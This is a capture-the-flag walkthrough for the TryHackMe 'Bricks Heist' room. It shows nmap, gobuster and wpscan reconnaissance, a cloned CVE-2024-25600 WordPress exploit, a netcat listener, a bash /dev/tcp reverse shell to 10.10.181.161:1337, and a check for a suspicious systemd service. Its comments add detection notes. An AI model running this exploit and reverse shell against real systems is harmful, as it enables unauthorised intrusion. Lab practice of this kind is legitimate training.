TryHack3M: Bricks Heist
Add hostname to hosts file
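# Map the room's hostname to the target address so requests for bricks.thm
# resolve locally. ${VICTIM:?...} aborts the command instead of appending a
# malformed " bricks.thm" entry when the variable is unset or empty, and the
# quoted expansion keeps the value as a single word. Appending to /etc/hosts
# requires root.
printf '%s bricks.thm\n' "${VICTIM:?set VICTIM to the target IP first}" >> /etc/hosts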
cat /etc/hosts
Scans
Initial scan
Kali
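# -A turns on OS detection, service/version detection, default script scanning
# and traceroute against nmap's default port set. It is a loud scan that is
# easy to spot in IDS and web-server logs. The expansion is quoted and guarded
# so an unset VICTIM fails here rather than running nmap with no target.
nmap -A "${VICTIM:?set VICTIM to the target IP first}"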

Longer scan
Kali
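# Full-range follow-up: -sT is a TCP connect() scan (completes the handshake,
# so it shows up in the target's connection logs), -sV probes service versions,
# -O attempts OS fingerprinting, and -p 1-65535 covers every TCP port.
# The expansion is quoted and guarded so an unset VICTIM fails here rather than
# running nmap with no target.
nmap -sV -sT -O -p 1-65535 "${VICTIM:?set VICTIM to the target IP first}"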
TCP/80 - HTTP
Kali
gobuster dir -u http://bricks.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/443 - HTTPS
Kali
# Directory and file brute force against the HTTPS vhost, trying each wordlist
# entry bare and with the php, html and txt extensions.
# --no-tls-validation (-k) skips certificate verification, presumably because
# the lab host's certificate does not validate for bricks.thm. On the server
# side this run appears as a dense burst of 404s from a single client.
gobuster dir \
  --no-tls-validation \
  --url https://bricks.thm \
  --wordlist /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \
  --extensions php,html,txt
Kali
# WordPress fingerprinting of the HTTPS site (core version, theme, plugins).
# --disable-tls-checks turns off certificate verification for the scan.
wpscan \
  --disable-tls-checks \
  --url https://bricks.thm/
Kali
# Third-party proof-of-concept code pulled from GitHub. Read the script before
# executing it and run it from a disposable analysis VM, because it executes
# with your user's privileges on the attacking host. The clone is not pinned to
# a commit, so what you get is whatever the default branch holds at clone time.
git clone https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT.git
cd CVE-2024-25600-EXPLOIT/
# -u takes the base URL of the site to test, the same HTTPS site scanned with
# wpscan above.
python CVE-2024-25600.py -u https://bricks.thm/
Initial Shell
Kali
nc -lvnp 1337
Kali(Shell)
# Reverse shell: an interactive bash whose stdin, stdout and stderr are all
# redirected to a TCP connection opened through bash's /dev/tcp pseudo-device,
# here to port 1337 on the listener's address.
# For detection: a `bash -i` process with a socket as its standard streams and
# an outbound connection to an unusual port is a strong indicator, especially
# when its parent is a web-server or PHP worker process. That is presumably the
# case here, since the command is sent through the web exploit's shell.
bash -c 'exec bash -i >& /dev/tcp/10.10.181.161/1337 0>&1'
Victim
# List the service units that are currently in the running state. Reviewing
# this list for units that do not belong is a quick persistence check during
# triage.
systemctl list-units --state=running --type=service
Victim
# Print the unit file (and any drop-ins) behind ubuntu.service.
# NOTE(review): the generic name looks chosen to blend in. Confirm against a
# clean install of the same release. ExecStart= shows which binary the unit
# actually launches, and Restart=/WantedBy= show how it persists across reboots.
systemctl cat ubuntu.service